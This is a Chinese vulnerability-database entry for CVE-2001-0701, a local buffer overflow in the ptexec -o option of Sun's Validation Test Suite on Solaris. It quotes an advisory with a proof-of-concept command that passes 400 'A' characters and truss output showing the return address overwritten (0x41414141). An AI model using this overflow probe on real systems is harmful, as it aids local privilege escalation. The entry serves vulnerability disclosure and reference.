Sun Validation Test Suite ptexec缓冲区溢出漏洞

16次阅读
没有评论

Sun Validation Test Suite ptexec缓冲区溢出漏洞

漏洞ID 1106406 漏洞类型 缓冲区溢出
发布时间 2001-06-21 更新时间 2005-05-02
Sun Validation Test Suite ptexec缓冲区溢出漏洞CVE编号 CVE-2001-0701
Sun Validation Test Suite ptexec缓冲区溢出漏洞CNNVD-ID CNNVD-200109-119
漏洞平台 Solaris CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/20945
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-119
|漏洞详情
SunValidationTestSuite4.3以及之前版本ptexec存在缓冲区溢出漏洞。本地用户借助超长-o参数提升特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/2898/info

SunVTS is the Sun Validation Test Suite, distributed and maintained by Sun Microsystems. The SunVTS is used to test various components of OEM Sun hardware, and can also be used to stress-test components and sub-components.

A buffer overflow in the -o of the ptexec command exists. It is possible for a local user to overwrite stack memory, including the return address.

This makes it possible for a local user to gain elevated privileges, and potentially full administrative access. 

# > .sunvts_sec_gss
# /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`
Segmentation Fault (core dumped)

# truss /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`

execve("/opt/SUNWvts/bin/ptexec", 0xFFBEFA44, 0xFFBEFA54) argc = 3
stat("/opt/SUNWvts/bin/ptexec", 0xFFBEF780) = 0
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
open("/usr/lib/librpcsvc.so.1", O_RDONLY) = 3
fstat(3, 0xFFBEF518) = 0
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF3A0000

[.....]

sigprocmask(SIG_SETMASK, 0xFF23F010, 0x00000000) = 0
sigaction(SIGSEGV, 0xFFBEE388, 0x00000000) = 0
sigprocmask(SIG_SETMASK, 0xFF24ADE0, 0x00000000) = 0
setcontext(0xFFBEE248)
Incurred fault #6, FLTBOUNDS %pc = 0xFF139FF0
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
|参考资料

来源:XF
名称:sunvts-ptexec-bo(6736)
链接:http://xforce.iss.net/static/6736.php
来源:BID
名称:2898
链接:http://www.securityfocus.com/bid/2898
来源:BUGTRAQ
名称:20010621Solaris/opt/SUNWvts/bin/ptexecVulnerability
链接:http://www.securityfocus.com/archive/1/192667

相关推荐: Linux Kernel SYS_IA32.C Unspecified Buffer Overflow Vulnerability

Linux Kernel SYS_IA32.C Unspecified Buffer Overflow Vulnerability 漏洞ID 1097605 漏洞类型 Boundary Condition Error 发布时间 2004-11-29 更新时间 …

正文完
 0